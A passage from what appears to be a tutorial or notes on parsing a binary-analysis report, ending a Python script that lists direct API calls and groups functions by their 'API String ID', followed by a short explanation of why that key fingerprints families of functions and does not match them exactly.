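    return [f"{a['module']}!{a['name']}" for a in entry["apis"] if a["subcall_of"] is None]


def group_by_api_string_id(entries):
    """Map the report's API String ID (API set plus referenced strings) to entry indexes."""
    groups = defaultdict(list)
    for i, e in enumerate(entries):
        for sid in e["fields"].get("API String ID", []):
            groups[sid].append(i)
    return dict(groups)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for i, e in enumerate(parsed):
        print(i, direct_calls(e), e["fields"].get("API String ID"))
    print(group_by_api_string_id(parsed))
```

Grouping by API String ID shows why that key is a family fingerprint rather than an exact match: the two Shell_TrayWnd functions share 529655941-2988720461 even though one has PostMessageW's arguments resolved and the other does not, so an exact-argument comparison has to be done on the parsed `args` rather than on the Similarity key.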